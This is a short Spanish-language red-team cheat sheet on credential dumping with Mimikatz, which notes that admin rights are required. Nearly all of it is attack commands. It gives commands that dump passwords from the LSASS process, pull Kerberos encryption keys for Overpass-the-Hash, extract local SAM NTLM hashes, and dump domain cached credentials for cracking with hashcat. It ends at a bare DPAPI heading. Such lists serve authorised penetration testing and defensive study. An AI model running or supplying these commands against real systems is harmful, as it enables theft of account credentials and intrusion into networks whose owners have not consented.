Documentacion
Red Team
Credential Dump
Mimikatz

Mimikatz

Note

Los siguiente comandos requieren privilegios de Admin en el sistema.

LSASS

Dump passwords del proceso lsass.exe.

mimikatz sekurlsa::logonpasswords

Kerberos ekeys

Dump Kerberos encryption keys para realizar Overpass the Hash.

mimikatz sekurlsa::ekeys

SAM

Dump NTLM hash del sistema Local.

mimikatz lsadump::sam

Domain Cached Credentials (DCC)

Dump Domain Cached Credentials para intentar crackear el hash usando hashcat.

mimikatz lsadump::cache
DPAPI